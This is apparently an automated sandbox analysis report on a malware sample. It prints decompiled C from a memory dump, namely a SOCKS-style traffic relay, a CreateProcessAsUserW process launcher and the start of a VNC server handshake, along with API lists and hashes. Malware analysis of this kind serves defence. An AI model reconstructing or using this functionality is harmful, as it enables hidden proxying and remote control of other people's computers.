											_t394 =  *(_t394 + 0x1c);
											__eflags = _t394 - _t403;
											if(_t394 != _t403) {
												continue;
											}
											goto L32;
										}
										_t395 = E004163FB(__eflags,  *((intOrPtr*)(_t394 + 0x18)),  *((intOrPtr*)(_t394 + 0x10)));
										_v32 = _t395;
										__eflags = _t395 - _t403;
										if(_t395 != _t403) {
											__eflags =  *_t395 - _t457;
											if( *_t395 == _t457) {
												 *(_t395 + 0x18) = _t403;
												 *(_t395 + 4) = _t403;
											}
										} else {
											_v13 = 1;
										}
										L34:
										__imp__freeaddrinfo(_v60);
										goto L44;
										L32:
										_t451 = _t451 + 1;
										__eflags = _t451 - 2;
									} while (_t451 < 2);
									_v13 = 4;
									goto L34;
								} else {
									_v13 = 4;
									L44:
									_push(_t403);
									_push( &_v64);
									_t283 = 2;
									_t284 = E0041935B(_t283, _t452);
									__eflags = _t284;
									if(_t284 != 0) {
										_v9 = 1;
										__eflags = _v13 - _t403;
										if(_v13 != _t403) {
											L145:
											E004163A8(_v32);
											_t286 = _v9;
											__eflags = _t286 - 1;
											if(_t286 != 1) {
												L47:
												return _t286;
											}
											__eflags = _v13;
											if(_v13 == 0) {
												goto L47;
											}
											_t287 = E00405F7D(_a4, 0xffffffff, _v13, _v44);
											__eflags = _t287;
											return _t287 & 0xffffff00 | _t287 != 0x00000000;
										}
										_t419 = _v32;
										 *((short*)(_t419 + 2)) = _v64;
										_t291 = (_v55 & 0x000000ff) - 1;
										__eflags = _t291;
										if(_t291 == 0) {
											_t458 = E004193F0(_v32);
											__eflags = _t458 - 0xffffffff;
											if(_t458 != 0xffffffff) {
												E004197A3(_t419, _t458);
												_t294 = E00405F7D(_a4, _t458, _t403, _v44);
												__eflags = _t294 - 1;
												if(_t294 != 1) {
													__eflags = _t294 - 0xffffffff;
													if(_t294 != 0xffffffff) {
														_v9 = _t403;
													} else {
														_v13 = 1;
													}
												} else {
													_push(_t458);
													_t294 = E004195A4(_a4);
												}
												L144:
												E0041974B(_t294, _t458);
												goto L145;
											}
											L138:
											_v13 = 5;
											goto L145;
										}
										_t296 = _t291 - 1;
										__eflags = _t296;
										if(_t296 == 0) {
											__eflags =  *_t419 - 0x17;
											 *((short*)(_t419 + 2)) = 0;
											if( *_t419 != 0x17) {
												 *(_t419 + 4) = _t403;
											} else {
												E0041645B(0, _t419, _t403, 0x10);
											}
											_t460 = E004194EA(_v32, 1);
											_v48 = _t460;
											__eflags = _t460 - 0xffffffff;
											if(_t460 == 0xffffffff) {
												goto L138;
											} else {
												_t454 = E00405F7D(_a4, _t460, _t403, _v44);
												__eflags = _t454 - 1;
												if(_t454 != 1) {
													L134:
													E0041974B(_t299, _t460);
													__eflags = _t454 - 0xffffffff;
													if(_t454 == 0xffffffff) {
														L124:
														_v13 = 1;
														goto L145;
													}
													__eflags = _t454 - 1;
													if(_t454 != 1) {
														_v9 = 0;
													}
													goto L145;
												}
												_v20 = E0041971B( &_v48,  &_a4);
												E0041974B(_t303, _v48);
												__eflags = _v20 - 0xffffffff;
												if(_v20 == 0xffffffff) {
													goto L124;
												}
												E004197A3(_t419, _v20);
												_t454 = E00405F7D(_a4, _v20, _t403, _v44 | 0x00000002);
												__eflags = _t454 - 1;
												if(_t454 == 1) {
													_push(_v20);
													_t299 = E004195A4(_a4);
												}
												_t460 = _v20;
												goto L134;
											}
										}
										__eflags = _t296 == 1;
										if(_t296 == 1) {
											_v80 = 0x80;
											_v88 = 0x80;
											_t312 =  &_v216;
											__imp__#6(_a4, _t312,  &_v80);
											__eflags = _t312;
											if(_t312 != 0) {
												goto L124;
											}
											_t314 =  &_v1008;
											__imp__#5(_a4, _t314,  &_v88);
											__eflags = _t314;
											if(_t314 != 0) {
												goto L124;
											}
											__eflags = _v216 - 0x17;
											_v214 = _t314;
											if(_v216 == 0x17) {
												_v192 = _t403;
												_v212 = _t403;
											}
											_t315 = E004197C8( &_v216);
											_v36 = _t315;
											__eflags = _t315 - 0xffffffff;
											if(_t315 == 0xffffffff) {
												goto L124;
											} else {
												_t455 = E00416378(0xffff);
												__eflags = _t455 - _t403;
												if(_t455 != _t403) {
													_t463 = _a4;
													_t317 = E00405F7D(_t463, _v36, _t403, _v44);
													__eflags = _t317 - 1;
													if(_t317 != 1) {
														__eflags = _t317 - 0xffffffff;
														if(_t317 != 0xffffffff) {
															_v9 = _t403;
														} else {
															_v13 = 1;
														}
														L122:
														_t294 = E004163A8(_t455);
														L123:
														_t458 = _v36;
														goto L144;
													}
													_v28 = _v28 | 0xffffffff;
													_v484 = _v484 | 0xffffffff;
													_v48 = _t403;
													_v20 = _t403;
													_v40 = _t403;
													_v496 = 2;
													_v492 = _t463;
													_v488 = _v36;
													while(1) {
														_t319 =  &_v496;
														__imp__#18(_t403, _t319, _t403, _t403, _t403);
														__eflags = _t319;
														if(_t319 <= 0) {
															break;
														}
														_t321 = E004192C5( &_v496, _a4);
														__eflags = _t321;
														if(_t321 == 0) {
															L64:
															_v24 = 0x80;
															_t323 = E004192C5( &_v496, _v36);
															__eflags = _t323;
															if(_t323 == 0) {
																L106:
																__eflags = _v28 - 0xffffffff;
																if(_v28 == 0xffffffff) {
																	L115:
																	_t403 = 0;
																	__eflags = 0;
																	L116:
																	_t324 = _v28;
																	__eflags = _t324 - 0xffffffff;
																	_v484 = _t324;
																	_t422 = (0 | _t324 != 0xffffffff) + 2;
																	__eflags = _t422;
																	_v496 = _t422;
																	_v492 = _a4;
																	_v488 = _v36;
																	continue;
																}
																_t326 = E004192C5( &_v496, _v28);
																__eflags = _t326;
																if(_t326 == 0) {
																	goto L115;
																}
																_t465 = _v48;
																_t403 = 0;
																_t331 = _t465 + _t455;
																__imp__#17(_v28, _t331, 0xffff - _t465, 0,  &_v216,  &_v24);
																__eflags = _t331;
																if(_t331 > 0) {
																	L110:
																	 *_t455 = 0;
																	 *((char*)(_t455 + 2)) = 0;
																	_v216 - 0x17 = _v20 - 0x17;
																	 *(_t455 + 3) = ((0 | _v216 != 0x00000017) - 0x00000001 & 0x00000003) + 1;
																	if(_v20 != 0x17) {
																		__eflags = _v20 - 2;
																		if(_v20 != 2) {
																			goto L116;
																		}
																		_push(4);
																		_t430 =  &_v212;
																		L114:
																		_t198 = _t455 + 4; // 0x4
																		E004163E4();
																		_t333 = E004163E4(_t465 + _t455 - 2,  &_v214, 2);
																		__imp__#20(_v36, _t455, _t333 + _t465, _t403,  &_v624, _v40, _t198, _t430);
																		goto L116;
																	}
																	_push(0x10);
																	_t430 =  &_v208;
																	goto L114;
																}
																__eflags = _v20 - (_v216 & 0x0000ffff);
																if(_v20 != (_v216 & 0x0000ffff)) {
																	goto L116;
																}
																goto L110;
															}
															_t321 =  &_v216;
															__imp__#17(_v36, _t455, 0xffff, _t403, _t321,  &_v24);
															_t466 = _t321;
															_v68 = _t466;
															__eflags = _t466 - _t403;
															if(_t466 <= _t403) {
																break;
															}
															__eflags = _t466 - 6;
															if(_t466 < 6) {
																goto L106;
															}
															_t337 = _v216;
															__eflags = _v1008 - _t337;
															if(_v1008 != _t337) {
																goto L106;
															}
															__eflags = _t337 - 2;
															if(_t337 != 2) {
																__eflags = _t337 - 0x17;
																if(_t337 != 0x17) {
																	L73:
																	__eflags =  *((char*)(_t455 + 2));
																	if( *((char*)(_t455 + 2)) != 0) {
																		goto L106;
																	}
																	__eflags =  *_t455 - _t403;
																	if( *_t455 != _t403) {
																		goto L106;
																	}
																	__eflags = _v40 - _t403;
																	if(_v40 == _t403) {
																		E004163E4( &_v624,  &_v216, _v24);
																		__eflags = _v624 - 0x17;
																		if(_v624 == 0x17) {
																			_v600 = _t403;
																			_v620 = _t403;
																		}
																		_v40 = _v24;
																	}
																	E0041645B( &_v216,  &_v216, _t403, 0x80);
																	_t341 = ( *(_t455 + 3) & 0x000000ff) - 1;
																	__eflags = _t341;
																	if(_t341 == 0) {
																		__eflags = _t466 - 0xa;
																		if(_t466 <= 0xa) {
																			goto L106;
																		}
																		_t342 = 2;
																		_v216 = _t342;
																		_t156 = _t455 + 4; // 0x4
																		_v24 = 0x10;
																		E004163E4( &_v212, _t156, 4);
																		_push(8);
																		goto L99;
																	} else {
																		_t361 = _t341;
																		__eflags = _t361;
																		if(_t361 == 0) {
																			_t362 =  *((intOrPtr*)(_t455 + 4));
																			__eflags = _t362;
																			if(_t362 == 0) {
																				goto L106;
																			}
																			_t363 = _t362 & 0x000000ff;
																			__eflags = _t466 - _t363 + 7;
																			if(_t466 <= _t363 + 7) {
																				goto L106;
																			}
																			_t133 = _t455 + 5; // 0x5
																			_t364 = E004163E4( &_v880, _t133, _t363);
																			 *((char*)(_t469 + _t364 - 0x36c)) = 0;
																			_t137 = _t364 + 5; // 0x5
																			_t406 = _t137;
																			_v52 = 0;
																			_t366 =  &_v880;
																			__imp__getaddrinfo(_t366, 0, 0,  &_v52);
																			__eflags = _t366;
																			if(_t366 != 0) {
																				goto L106;
																			}
																			_t450 = 0;
																			__eflags = 0;
																			do {
																				_t367 = _v52;
																				__eflags = _t367;
																				if(_t367 == 0) {
																					goto L92;
																				}
																				_t441 =  *((intOrPtr*)(_t469 + (_t450 & 0x000000ff) * 4 - 0x48));
																				while(1) {
																					__eflags =  *((intOrPtr*)(_t367 + 4)) - _t441;
																					if( *((intOrPtr*)(_t367 + 4)) == _t441) {
																						break;
																					}
																					_t367 =  *(_t367 + 0x1c);
																					__eflags = _t367;
																					if(_t367 != 0) {
																						continue;
																					}
																					goto L92;
																				}
																				_v24 =  *((intOrPtr*)(_t367 + 0x10));
																				E004163E4( &_v216,  *((intOrPtr*)(_t367 + 0x18)),  *((intOrPtr*)(_t367 + 0x10)));
																				__eflags = _v216 - 0x17;
																				if(_v216 == 0x17) {
																					_v192 = 0;
																					_v212 = 0;
																				}
																				__imp__freeaddrinfo(_v52);
																				L100:
																				_t407 = _t406 + 2;
																				__eflags = _v28 - 0xffffffff;
																				_v214 =  *((intOrPtr*)(_t406 + _t455));
																				if(_v28 != 0xffffffff) {
																					L103:
																					__eflags = _v68 - _t407;
																					if(_v68 > _t407) {
																						__eflags = _v20 - (_v216 & 0x0000ffff);
																						if(_v20 == (_v216 & 0x0000ffff)) {
																							_t408 = _t407 + _t455;
																							__eflags = _t408;
																							__imp__#20(_v28, _t408, _v68 - _t407, 0,  &_v216, _v24);
																						}
																					}
																					goto L106;
																				}
																				E0041645B( &_v752,  &_v752, 0, 0x80);
																				_t353 = _v216;
																				_v752 = _t353;
																				_v20 = _t353 & 0x0000ffff;
																				_t321 = E004197C8( &_v752);
																				_v28 = _t321;
																				__eflags = _t321 - 0xffffffff;
																				if(_t321 == 0xffffffff) {
																					goto L118;
																				}
																				__eflags = _v20 - 0x17;
																				_t359 = ((0 | _v20 != 0x00000017) - 0x00000001 & 0x0000000c) + 0xa;
																				__eflags = _t359;
																				_v48 = _t359;
																				goto L103;
																				L92:
																				_t450 = _t450 + 1;
																				__eflags = _t450 - 2;
																			} while (_t450 < 2);
																			goto L106;
																		}
																		__eflags = _t361 != 1;
																		if(_t361 != 1) {
																			goto L106;
																		}
																		__eflags = _t466 - 0x16;
																		if(_t466 <= 0x16) {
																			goto L106;
																		}
																		_t371 = 0x17;
																		_v216 = _t371;
																		_t128 = _t455 + 4; // 0x4
																		_v24 = 0x1c;
																		E004163E4( &_v208, _t128, 0x10);
																		_push(0x14);
																		L99:
																		_pop(_t406);
																		goto L100;
																	}
																}
																__eflags = E00416419( &_v208,  &_v1000, 0x10);
																L72:
																if(__eflags != 0) {
																	goto L106;
																}
																goto L73;
															}
															__eflags = _v1004 - _v212;
															goto L72;
														}
														__imp__#16(_a4, _t455, 0xffff, _t403);
														__eflags = _t321;
														if(_t321 <= 0) {
															break;
														}
														goto L64;
													}
													L118:
													E0041974B(_t321, _v28);
													goto L122;
												}
												_v13 = 1;
												goto L123;
											}
										}
										_v13 = 7;
										goto L145;
									}
									E004163A8(_v32);
									goto L46;
								}
							}
							__eflags = _t384 != 1;
							if(_t384 != 1) {
								goto L46;
							}
							_push(_t403);
							_push( &_v232);
							_t398 = 0x10;
							_t399 = E0041935B(_t398, _t452);
							__eflags = _t399;
							if(_t399 == 0) {
								goto L46;
							}
							_t400 = 0x1c;
							_t401 = E00416378(_t400);
							_v32 = _t401;
							__eflags = _t401 - _t403;
							if(_t401 == _t403) {
								L41:
								_v13 = 1;
							} else {
								 *_t401 = _t457;
								_push(0x10);
								_t417 =  &_v232;
								_t280 = _t401 + 8;
								L43:
								_push(_t417);
								_push(_t280);
								E004163E4();
							}
							goto L44;
						}
					}
					L4:
					_t262 = _t262 - 1;
					__eflags =  *(_t469 + _t262 - 0x36c) - _t403;
					if( *(_t469 + _t262 - 0x36c) == _t403) {
						_t263 = _t469 + _t262 - 0x36c;
						goto L7;
					}
					goto L5;
				}
			}

0x004060a1
0x004060a5
0x004060b3
0x004060bd
0x004060c9
0x004062fd
0x004062fd
0x00000000
0x004060f3
0x004060f3
0x00000000
0x00406103
0x00406105
0x00000000
0x00406107
0x00406107
0x00406107
0x00406109
0x0040610b
0x0040611c
0x0040612d
0x00000000
0x00000000
0x00406137
0x00000000
0x00406139
0x00406149
0x0040614d
0x00406150
0x00406153
0x00406156
0x0040615b
0x0040615d
0x00000000
0x00406163
0x00406163
0x00406167
0x00000000
0x00000000
0x0040616d
0x00406173
0x00406174
0x00406182
0x00406189
0x00406176
0x00406176
0x00406179
0x00406179
0x00406190
0x00406190
0x00406191
0x00406194
0x004062a5
0x004062a9
0x004062ac
0x004062af
0x004062b4
0x004062b6
0x00000000
0x00000000
0x004062ba
0x004062bb
0x004062c0
0x004062c3
0x004062c5
0x004062cf
0x004062d0
0x004062d3
0x004062d5
0x004062d8
0x004062d8
0x00000000
0x004062d8
0x00000000
0x0040619a
0x0040619b
0x0040619b
0x0040619c
0x004061ef
0x004061f4
0x004061f6
0x00000000
0x00000000
0x004061fc
0x004061ff
0x00000000
0x00000000
0x00406213
0x00406218
0x0040621a
0x00000000
0x00000000
0x00406224
0x00406231
0x00406238
0x0040623b
0x00406241
0x00406243
0x0040624e
0x0040624e
0x00406250
0x00406250
0x00406253
0x00406255
0x00000000
0x00000000
0x0040625a
0x0040625e
0x0040625e
0x00406261
0x00000000
0x00000000
0x00406263
0x00406266
0x00406268
0x00000000
0x00000000
0x00000000
0x00406268
0x00406286
0x0040628b
0x0040628e
0x00406290
0x00406298
0x0040629b
0x0040629d
0x004062a0
0x004062a0
0x00406292
0x00406292
0x00406292
0x00406275
0x00406278
0x00000000
0x0040626a
0x0040626a
0x0040626c
0x0040626c
0x00406271
0x00000000
0x00406245
0x00406245
0x004062e2
0x004062e2
0x004062e6
0x004062e9
0x004062ec
0x004062f1
0x004062f3
0x00406306
0x0040630a
0x0040630d
0x0040692f
0x00406932
0x00406937
0x0040693a
0x0040693c
0x00406303
0x00406303
0x00406303
0x00406942
0x00406946
0x00000000
0x00000000
0x00406957
0x0040695c
0x00000000
0x0040695e
0x00406317
0x0040631a
0x00406322
0x00406322
0x00406323
0x004068ec
0x004068ee
0x004068f1
0x004068fa
0x00406907
0x0040690c
0x0040690f
0x0040691c
0x0040691f
0x00406927
0x00406921
0x00406921
0x00406921
0x00406911
0x00406914
0x00406915
0x00406915
0x0040692a
0x0040692a
0x00000000
0x0040692a
0x004068f3
0x004068f3
0x00000000
0x004068f3
0x00406329
0x00406329
0x0040632a
0x00406836
0x0040683a
0x0040683e
0x0040684e
0x00406840
0x00406847
0x00406847
0x0040685b
0x0040685d
0x00406860
0x00406863
0x00000000
0x00406869
0x00406876
0x00406878
0x0040687b
0x004068cb
0x004068cb
0x004068d0
0x004068d3
0x0040682b
0x0040682b
0x00000000
0x0040682b
0x004068d9
0x004068dc
0x004068de
0x004068de
0x00000000
0x004068dc
0x0040688d
0x00406890
0x00406895
0x00406899
0x00000000
0x00000000
0x0040689e
0x004068b6
0x004068b8
0x004068bb
0x004068bd
0x004068c3
0x004068c3
0x004068c8
0x00000000
0x004068c8
0x00406863
0x00406330
0x00406331
0x00406341
0x00406344
0x0040634b
0x00406355
0x0040635b
0x0040635d
0x00000000
0x00000000
0x00406367
0x00406371
0x00406377
0x00406379
0x00000000
0x00000000
0x0040637f
0x00406387
0x0040638e
0x00406390
0x00406396
0x00406396
0x004063a2
0x004063a7
0x004063aa
0x004063ad
0x00000000
0x004063b3
0x004063bd
0x004063bf
0x004063c1
0x004063cf
0x004063d7
0x004063dc
0x004063df
0x0040680f
0x00406812
0x0040681a
0x00406814
0x00406814
0x00406814
0x0040681d
0x0040681e
0x00406823
0x00406823
0x00000000
0x00406823
0x004063e8
0x004063ec
0x004063f3
0x004063f6
0x004063f9
0x004063fc
0x00406406
0x0040640c
0x004067ec
0x004067ef
0x004067f7
0x004067fd
0x004067ff
0x00000000
0x00000000
0x00406420
0x00406425
0x00406427
0x00406441
0x0040644a
0x00406451
0x00406456
0x00406458
0x004066f6
0x004066f6
0x004066fa
0x004067be
0x004067be
0x004067be
0x004067c0
0x004067c0
0x004067c5
0x004067cb
0x004067d1
0x004067d1
0x004067d4
0x004067dd
0x004067e6
0x00000000
0x004067e6
0x00406709
0x0040670e
0x00406710
0x00000000
0x00000000
0x00406716
0x00406724
0x0040672f
0x00406736
0x0040673c
0x0040673e
0x0040674c
0x0040674e
0x00406751
0x00406766
0x0040676a
0x0040676d
0x00406779
0x0040677d
0x00000000
0x00000000
0x0040677f
0x00406781
0x00406787
0x00406788
0x0040678c
0x0040679f
0x004067b6
0x00000000
0x004067b6
0x0040676f
0x00406771
0x00000000
0x00406771
0x00406747
0x0040674a
0x00000000
0x00000000
0x00000000
0x0040674a
0x00406462
0x00406473
0x00406479
0x0040647b
0x0040647e
0x00406480
0x00000000
0x00000000
0x00406486
0x00406489
0x00000000
0x00000000
0x0040648f
0x00406496
0x0040649d
0x00000000
0x00000000
0x004064a3
0x004064a7
0x004064b7
0x004064bb
0x004064d8
0x004064d8
0x004064dc
0x00000000
0x00000000
0x004064e2
0x004064e5
0x00000000
0x00000000
0x004064eb
0x004064ee
0x00406501
0x00406506
0x0040650e
0x00406510
0x00406516
0x00406516
0x0040651f
0x0040651f
0x0040652f
0x00406538
0x00406538
0x00406539
0x00406633
0x00406636
0x00000000
0x00000000
0x0040663e
0x0040663f
0x00406648
0x00406653
0x0040665a
0x0040665f
0x00000000
0x0040653f
0x00406540
0x00406540
0x00406541
0x0040657d
0x00406580
0x00406582
0x00000000
0x00000000
0x00406588
0x0040658e
0x00406590
0x00000000
0x00000000
0x00406597
0x004065a2
0x004065a7
0x004065af
0x004065af
0x004065ba
0x004065bd
0x004065c4
0x004065ca
0x004065cc
0x00000000
0x00000000
0x004065d2
0x004065d4
0x004065d6
0x004065d6
0x004065d9
0x004065db
0x00000000
0x00000000
0x004065e0
0x004065e4
0x004065e4
0x004065e7
0x00000000
0x00000000
0x004065e9
0x004065ec
0x004065ee
0x00000000
0x00000000
0x00000000
0x004065ee
0x00406600
0x0040660d
0x00406612
0x0040661a
0x0040661c
0x00406622
0x00406622
0x0040662b
0x00406662
0x00406666
0x00406669
0x0040666d
0x00406674
0x004066c7
0x004066c7
0x004066ca
0x004066d3
0x004066d6
0x004066ea
0x004066ea
0x004066f0
0x004066f0
0x004066d6
0x00000000
0x004066ca
0x00406684
0x00406689
0x00406690
0x004066a0
0x004066a3
0x004066a8
0x004066ab
0x004066ae
0x00000000
0x00000000
0x004066b6
0x004066c1
0x004066c1
0x004066c4
0x00000000
0x004065f0
0x004065f0
0x004065f2
0x004065f2
0x00000000
0x004065f7
0x00406543
0x00406544
0x00000000
0x00000000
0x0040654a
0x0040654d
0x00000000
0x00000000
0x00406555
0x00406556
0x0040655f
0x0040656a
0x00406571
0x00406576
0x00406661
0x00406661
0x00000000
0x00406661
0x00406539
0x004064d0
0x004064d2
0x004064d2
0x00000000
0x00000000
0x00000000
0x004064d2
0x004064af
0x00000000
0x004064af
0x00406433
0x00406439
0x0040643b
0x00000000
0x00000000
0x00000000
0x0040643b
0x00406805
0x00406808
0x00000000
0x00406808
0x004063c3
0x00000000
0x004063c3
0x004063ad
0x00406333
0x00000000
0x00406333
0x004062f8
0x00000000
0x004062f8
0x00406243
0x0040619e
0x0040619f
0x00000000
0x00000000
0x004061a5
0x004061ac
0x004061af
0x004061b2
0x004061b7
0x004061b9
0x00000000
0x00000000
0x004061c1
0x004061c2
0x004061c7
0x004061ca
0x004061cc
0x004062c7
0x004062c7
0x004061d2
0x004061d2
0x004061d5
0x004061d7
0x004061dd
0x004062db
0x004062db
0x004062dc
0x004062dd
0x004062dd
0x00000000
0x004061cc
0x00406194
0x004060f9
0x004060f9
0x004060fa
0x00406101
0x00406140
0x00000000
0x00406140
0x00000000
0x00406101

APIs

Part of subcall function 00419960: getsockname.WS2_32(?,?,?), ref: 0041997E

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040623B
freeaddrinfo.WS2_32(?), ref: 00406278
getsockname.WS2_32(?,?,?), ref: 00406355
getpeername.WS2_32(?,?,?), ref: 00406371

Part of subcall function 0041935B: recv.WS2_32(?,?,00000001,00000000), ref: 0041937F

recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 00406433
recvfrom.WS2_32(?,00000000,0000FFFF,00000000,00000017,00000080), ref: 00406473
getaddrinfo.WS2_32(00000000,00000000,00000000,?), ref: 004065C4
freeaddrinfo.WS2_32(?,00000017,000000FF,?), ref: 0040662B
sendto.WS2_32(000000FF,00000006,?,00000000,00000017,00000010), ref: 004066F0
recvfrom.WS2_32(000000FF,0000FFFF,0000FFFF,00000000,00000017,00000080), ref: 00406736
sendto.WS2_32(?,00000000,00000000,00000000,?,?), ref: 004067B6
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 004067F7

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetsocknamerecvrecvfromsendto$getpeernameselect
String ID:
API String ID: 3747714436-0
Opcode ID: 01d8fe55f2997c812acc76f2d695a4be4ef4a1c57136e4876ec3400d570d6e5a
Instruction ID: 61da10105d9ead6b3157467ca42ce45605a95d001ea92bb118dbe0d971dae729
Opcode Fuzzy Hash: 01d8fe55f2997c812acc76f2d695a4be4ef4a1c57136e4876ec3400d570d6e5a
Instruction Fuzzy Hash: 3042C371800119ABCF20AFA4CC41BEEBBB9AF04304F0545BBE516B72D1D3398E95DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00417CCA, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417CCA(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E0041645B( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x00417cd8
0x00417cdb
0x00417ce1
0x00417ce6
0x00417d04
0x00417d06
0x00417d08
0x00417d0d
0x00417d1b
0x00417d1c
0x00417d22
0x00417d23
0x00417d2a
0x00417d2c
0x00417d2c
0x00417d31
0x00417d35
0x00417d3e
0x00417d43
0x00417d46
0x00417d49
0x00417d4e
0x00417d50
0x00417d50
0x00417d62
0x00417d7f
0x00417d8a
0x00417d8f
0x00417d94
0x00417d94
0x00417d9b
0x00417da0
0x00417da0
0x00417d9b
0x00417da6
0x00417dad
0x00417db4

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417CDB
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417CFA
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D06
CreateProcessAsUserW.ADVAPI32(?,00000000,00408EAC,00000000,00000000,00000000,00408EAC,00408EAC,00000000,?,?,?,00000000,00000044), ref: 00417D77
CloseHandle.KERNEL32(?), ref: 00417D8A
CloseHandle.KERNEL32(?), ref: 00417D8F
FreeLibrary.KERNEL32(?), ref: 00417DA6

Strings

CreateEnvironmentBlock, xrefs: 00417CF4
DestroyEnvironmentBlock, xrefs: 00417CFC
userenv.dll, xrefs: 00417CD3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 7237c3f88202269f99e2911e343ac4e9e614d004b24a54491cf6b7f127eeb005
Instruction ID: b6f22354a605402fa7521ef26449bf774c4e317b46c81bfd816043db15bb7698
Opcode Fuzzy Hash: 7237c3f88202269f99e2911e343ac4e9e614d004b24a54491cf6b7f127eeb005
Instruction Fuzzy Hash: 6D2116B2D0021DAFDF009FE4DC849EEBBB9EF48344F14847AE505B2160D6789E85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00410F8B, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00410F8B(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E004193D2(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E0041935B(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E00416F0B(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00416A27( &_v52, "RFB ", 0);
				_t206 = ((E00416A27( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
